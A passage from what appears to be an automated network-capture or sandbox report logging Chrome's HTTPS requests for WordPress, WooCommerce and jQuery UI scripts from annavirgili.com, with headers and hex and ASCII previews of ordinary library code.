                                                                                                          2024-12-12 11:58:27 UTC2914INData Raw: 69 66 20 28 27 75 6e 64 65 66 69 6e 65 64 27 20 3d 3d 3d 20 74 79 70 65 6f 66 20 42 47 5f 53 48 43 45 5f 55 53 45 5f 45 46 46 45 43 54 53 29 20 7b 0a 09 42 47 5f 53 48 43 45 5f 55 53 45 5f 45 46 46 45 43 54 53 20 3d 20 27 30 27 3b 0a 7d 20 0a 69 66 20 28 27 75 6e 64 65 66 69 6e 65 64 27 20 3d 3d 3d 20 74 79 70 65 6f 66 20 42 47 5f 53 48 43 45 5f 54 4f 47 47 4c 45 5f 53 50 45 45 44 29 20 7b 0a 09 42 47 5f 53 48 43 45 5f 54 4f 47 47 4c 45 5f 53 50 45 45 44 20 3d 20 27 30 27 3b 0a 7d 20 0a 69 66 20 28 27 75 6e 64 65 66 69 6e 65 64 27 20 3d 3d 3d 20 74 79 70 65 6f 66 20 42 47 5f 53 48 43 45 5f 54 4f 47 47 4c 45 5f 4f 50 54 49 4f 4e 53 29 20 7b 0a 09 42 47 5f 53 48 43 45 5f 54 4f 47 47 4c 45 5f 4f 50 54 49 4f 4e 53 20 3d 20 27 73 77 69 6e 67 27 3b 0a 7d 0a 69
                                                                                                          Data Ascii: if ('undefined' === typeof BG_SHCE_USE_EFFECTS) {BG_SHCE_USE_EFFECTS = '0';} if ('undefined' === typeof BG_SHCE_TOGGLE_SPEED) {BG_SHCE_TOGGLE_SPEED = '0';} if ('undefined' === typeof BG_SHCE_TOGGLE_OPTIONS) {BG_SHCE_TOGGLE_OPTIONS = 'swing';}i


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          77192.168.2.2449867147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:27 UTC462OUTGET /wp-content/plugins/contact-form-7/includes/js/index.js?ver=5.9.6 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: none
                                                                                                          Sec-Fetch-Mode: cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd
                                                                                                          2024-12-12 11:58:27 UTC283INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:27 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Thu, 04 Jul 2024 23:27:33 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 13054
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: private
                                                                                                          Connection: close
                                                                                                          Content-Type: application/javascript
                                                                                                          2024-12-12 11:58:27 UTC13054INData Raw: 28 28 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 63 6f 6e 73 74 20 65 3d 65 3d 3e 4d 61 74 68 2e 61 62 73 28 70 61 72 73 65 49 6e 74 28 65 2c 31 30 29 29 2c 74 3d 28 65 2c 74 2c 61 29 3d 3e 7b 63 6f 6e 73 74 20 6e 3d 6e 65 77 20 43 75 73 74 6f 6d 45 76 65 6e 74 28 60 77 70 63 66 37 24 7b 74 7d 60 2c 7b 62 75 62 62 6c 65 73 3a 21 30 2c 64 65 74 61 69 6c 3a 61 7d 29 3b 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 28 65 3d 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 65 29 29 2c 65 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 6e 29 7d 2c 61 3d 28 65 2c 61 29 3d 3e 7b 63 6f 6e 73 74 20 6e 3d 6e 65 77 20 4d 61 70 28 5b 5b 22 69 6e 69 74 22 2c 22 69 6e 69 74 22 5d 2c 5b 22 76 61 6c 69 64 61 74 69 6f 6e 5f 66 61 69
                                                                                                          Data Ascii: (()=>{"use strict";const e=e=>Math.abs(parseInt(e,10)),t=(e,t,a)=>{const n=new CustomEvent(`wpcf7${t}`,{bubbles:!0,detail:a});"string"==typeof e&&(e=document.querySelector(e)),e.dispatchEvent(n)},a=(e,a)=>{const n=new Map([["init","init"],["validation_fai


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          78192.168.2.2449868147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:27 UTC671OUTGET /wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js?ver=2.7.0-wc.6.6.1 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: script
                                                                                                          Referer: https://annavirgili.com/
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd
                                                                                                          2024-12-12 11:58:27 UTC282INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:27 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Fri, 24 Jun 2022 09:41:11 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 9533
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: private
                                                                                                          Connection: close
                                                                                                          Content-Type: application/javascript
                                                                                                          2024-12-12 11:58:27 UTC9533INData Raw: 2f 2a 21 0a 20 2a 20 6a 51 75 65 72 79 20 62 6c 6f 63 6b 55 49 20 70 6c 75 67 69 6e 0a 20 2a 20 56 65 72 73 69 6f 6e 20 32 2e 37 30 2e 30 2d 32 30 31 34 2e 31 31 2e 32 33 0a 20 2a 20 52 65 71 75 69 72 65 73 20 6a 51 75 65 72 79 20 76 31 2e 37 20 6f 72 20 6c 61 74 65 72 0a 20 2a 0a 20 2a 20 45 78 61 6d 70 6c 65 73 20 61 74 3a 20 68 74 74 70 3a 2f 2f 6d 61 6c 73 75 70 2e 63 6f 6d 2f 6a 71 75 65 72 79 2f 62 6c 6f 63 6b 2f 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 30 37 2d 32 30 31 33 20 4d 2e 20 41 6c 73 75 70 0a 20 2a 20 44 75 61 6c 20 6c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 61 6e 64 20 47 50 4c 20 6c 69 63 65 6e 73 65 73 3a 0a 20 2a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 6f 70 65 6e 73 6f 75 72 63 65 2e 6f 72 67
                                                                                                          Data Ascii: /*! * jQuery blockUI plugin * Version 2.70.0-2014.11.23 * Requires jQuery v1.7 or later * * Examples at: http://malsup.com/jquery/block/ * Copyright (c) 2007-2013 M. Alsup * Dual licensed under the MIT and GPL licenses: * http://www.opensource.org


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          79192.168.2.2449866147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:27 UTC453OUTGET /wp-includes/js/jquery/ui/effect-slide.min.js?ver=1.13.3 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: none
                                                                                                          Sec-Fetch-Mode: cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd
                                                                                                          2024-12-12 11:58:27 UTC281INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:27 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Tue, 16 Jul 2024 22:20:29 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 917
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: private
                                                                                                          Connection: close
                                                                                                          Content-Type: application/javascript
                                                                                                          2024-12-12 11:58:27 UTC917INData Raw: 2f 2a 21 0a 20 2a 20 6a 51 75 65 72 79 20 55 49 20 45 66 66 65 63 74 73 20 53 6c 69 64 65 20 31 2e 31 33 2e 33 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 6a 71 75 65 72 79 75 69 2e 63 6f 6d 0a 20 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 6c 69 63 65 6e 73 65 2e 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66
                                                                                                          Data Ascii: /*! * jQuery UI Effects Slide 1.13.3 * https://jqueryui.com * * Copyright OpenJS Foundation and other contributors * Released under the MIT license. * https://jquery.org/license */!function(e){"use strict";"function"==typeof define&&define.amd?def


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          80192.168.2.2449870147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:27 UTC447OUTGET /wp-includes/js/jquery/ui/effect.min.js?ver=1.13.3 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: none
                                                                                                          Sec-Fetch-Mode: cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd
                                                                                                          2024-12-12 11:58:27 UTC283INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:27 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Tue, 16 Jul 2024 22:20:29 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 10332
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: private
                                                                                                          Connection: close
                                                                                                          Content-Type: application/javascript
                                                                                                          2024-12-12 11:58:27 UTC10332INData Raw: 2f 2a 21 0a 20 2a 20 6a 51 75 65 72 79 20 55 49 20 45 66 66 65 63 74 73 20 31 2e 31 33 2e 33 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 6a 71 75 65 72 79 75 69 2e 63 6f 6d 0a 20 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 6c 69 63 65 6e 73 65 2e 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 22
                                                                                                          Data Ascii: /*! * jQuery UI Effects 1.13.3 * https://jqueryui.com * * Copyright OpenJS Foundation and other contributors * Released under the MIT license. * https://jquery.org/license */!function(t){"use strict";"function"==typeof define&&define.amd?define(["


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          81192.168.2.2449869147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:27 UTC661OUTGET /wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2.1.4-wc.6.6.1 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: script
                                                                                                          Referer: https://annavirgili.com/
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd
                                                                                                          2024-12-12 11:58:27 UTC282INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:27 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Fri, 24 Jun 2022 09:41:11 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 1834
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: private
                                                                                                          Connection: close
                                                                                                          Content-Type: application/javascript
                                                                                                          2024-12-12 11:58:27 UTC1834INData Raw: 2f 2a 21 0a 20 2a 20 4a 61 76 61 53 63 72 69 70 74 20 43 6f 6f 6b 69 65 20 76 32 2e 31 2e 34 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 6a 73 2d 63 6f 6f 6b 69 65 2f 6a 73 2d 63 6f 6f 6b 69 65 0a 20 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 30 36 2c 20 32 30 31 35 20 4b 6c 61 75 73 20 48 61 72 74 6c 20 26 20 46 61 67 6e 65 72 20 42 72 61 63 6b 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 6c 69 63 65 6e 73 65 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 2c 6f 2c 74 3d 21 31 3b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 26 26 28 64 65 66 69 6e 65 28 65 29 2c 74 3d 21 30 29 2c 22 6f 62 6a 65 63 74
                                                                                                          Data Ascii: /*! * JavaScript Cookie v2.1.4 * https://github.com/js-cookie/js-cookie * * Copyright 2006, 2015 Klaus Hartl & Fagner Brack * Released under the MIT license */!function(e){var n,o,t=!1;"function"==typeof define&&define.amd&&(define(e),t=!0),"object


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          82192.168.2.2449871147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:27 UTC653OUTGET /wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=6.6.1 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: script
                                                                                                          Referer: https://annavirgili.com/
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd
                                                                                                          2024-12-12 11:58:28 UTC282INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:27 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Fri, 24 Jun 2022 09:41:11 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 2139
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: private
                                                                                                          Connection: close
                                                                                                          Content-Type: application/javascript
                                                                                                          2024-12-12 11:58:28 UTC2139INData Raw: 6a 51 75 65 72 79 28 66 75 6e 63 74 69 6f 6e 28 73 29 7b 73 28 22 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 6f 72 64 65 72 69 6e 67 22 29 2e 6f 6e 28 22 63 68 61 6e 67 65 22 2c 22 73 65 6c 65 63 74 2e 6f 72 64 65 72 62 79 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 73 28 74 68 69 73 29 2e 63 6c 6f 73 65 73 74 28 22 66 6f 72 6d 22 29 2e 74 72 69 67 67 65 72 28 22 73 75 62 6d 69 74 22 29 7d 29 2c 73 28 22 69 6e 70 75 74 2e 71 74 79 3a 6e 6f 74 28 2e 70 72 6f 64 75 63 74 2d 71 75 61 6e 74 69 74 79 20 69 6e 70 75 74 2e 71 74 79 29 22 29 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6f 3d 70 61 72 73 65 46 6c 6f 61 74 28 73 28 74 68 69 73 29 2e 61 74 74 72 28 22 6d 69 6e 22 29 29 3b 30 3c 3d 6f 26 26 70 61 72 73 65 46 6c 6f 61 74 28 73 28 74 68 69 73
                                                                                                          Data Ascii: jQuery(function(s){s(".woocommerce-ordering").on("change","select.orderby",function(){s(this).closest("form").trigger("submit")}),s("input.qty:not(.product-quantity input.qty)").each(function(){var o=parseFloat(s(this).attr("min"));0<=o&&parseFloat(s(this


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          83192.168.2.2449873147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:27 UTC656OUTGET /wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.js?ver=6.6.1 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: script
                                                                                                          Referer: https://annavirgili.com/
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd
                                                                                                          2024-12-12 11:58:28 UTC282INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:28 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Fri, 24 Jun 2022 09:41:11 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 2938
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: private
                                                                                                          Connection: close
                                                                                                          Content-Type: application/javascript
                                                                                                          2024-12-12 11:58:28 UTC2938INData Raw: 6a 51 75 65 72 79 28 66 75 6e 63 74 69 6f 6e 28 72 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 77 63 5f 63 61 72 74 5f 66 72 61 67 6d 65 6e 74 73 5f 70 61 72 61 6d 73 29 72 65 74 75 72 6e 21 31 3b 76 61 72 20 74 3d 21 30 2c 6f 3d 77 63 5f 63 61 72 74 5f 66 72 61 67 6d 65 6e 74 73 5f 70 61 72 61 6d 73 2e 63 61 72 74 5f 68 61 73 68 5f 6b 65 79 3b 74 72 79 7b 74 3d 22 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 22 69 6e 20 77 69 6e 64 6f 77 26 26 6e 75 6c 6c 21 3d 3d 77 69 6e 64 6f 77 2e 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 2c 77 69 6e 64 6f 77 2e 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 22 77 63 22 2c 22 74 65 73 74 22 29 2c 77 69 6e 64 6f 77 2e 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 2e 72 65
                                                                                                          Data Ascii: jQuery(function(r){if("undefined"==typeof wc_cart_fragments_params)return!1;var t=!0,o=wc_cart_fragments_params.cart_hash_key;try{t="sessionStorage"in window&&null!==window.sessionStorage,window.sessionStorage.setItem("wc","test"),window.sessionStorage.re


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          84192.168.2.2449872147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:27 UTC457OUTGET /wp-includes/js/jquery/ui/effect-highlight.min.js?ver=1.13.3 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: none
                                                                                                          Sec-Fetch-Mode: cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd
                                                                                                          2024-12-12 11:58:28 UTC281INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:28 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Tue, 16 Jul 2024 22:20:29 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 648
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: private
                                                                                                          Connection: close
                                                                                                          Content-Type: application/javascript
                                                                                                          2024-12-12 11:58:28 UTC648INData Raw: 2f 2a 21 0a 20 2a 20 6a 51 75 65 72 79 20 55 49 20 45 66 66 65 63 74 73 20 48 69 67 68 6c 69 67 68 74 20 31 2e 31 33 2e 33 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 6a 71 75 65 72 79 75 69 2e 63 6f 6d 0a 20 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 6c 69 63 65 6e 73 65 2e 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64
                                                                                                          Data Ascii: /*! * jQuery UI Effects Highlight 1.13.3 * https://jqueryui.com * * Copyright OpenJS Foundation and other contributors * Released under the MIT license. * https://jquery.org/license */!function(e){"use strict";"function"==typeof define&&define.amd


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          85192.168.2.2449874147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:28 UTC452OUTGET /wp-includes/js/jquery/ui/effect-fold.min.js?ver=1.13.3 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: none
                                                                                                          Sec-Fetch-Mode: cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd
                                                                                                          2024-12-12 11:58:28 UTC282INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:28 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Tue, 16 Jul 2024 22:20:29 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 1020
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: private
                                                                                                          Connection: close
                                                                                                          Content-Type: application/javascript
                                                                                                          2024-12-12 11:58:28 UTC1020INData Raw: 2f 2a 21 0a 20 2a 20 6a 51 75 65 72 79 20 55 49 20 45 66 66 65 63 74 73 20 46 6f 6c 64 20 31 2e 31 33 2e 33 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 6a 71 75 65 72 79 75 69 2e 63 6f 6d 0a 20 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 6c 69 63 65 6e 73 65 2e 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69
                                                                                                          Data Ascii: /*! * jQuery UI Effects Fold 1.13.3 * https://jqueryui.com * * Copyright OpenJS Foundation and other contributors * Released under the MIT license. * https://jquery.org/license */!function(e){"use strict";"function"==typeof define&&define.amd?defi


                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                          86192.168.2.244987523.32.238.185443
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:28 UTC436OUTOPTIONS /api/report?cat=bingth&ndcParam=QUZE HTTP/1.1
                                                                                                          Host: aefd.nelreports.net
                                                                                                          Connection: keep-alive
                                                                                                          Origin: https://th.bing.com
                                                                                                          Access-Control-Request-Method: POST
                                                                                                          Access-Control-Request-Headers: content-type
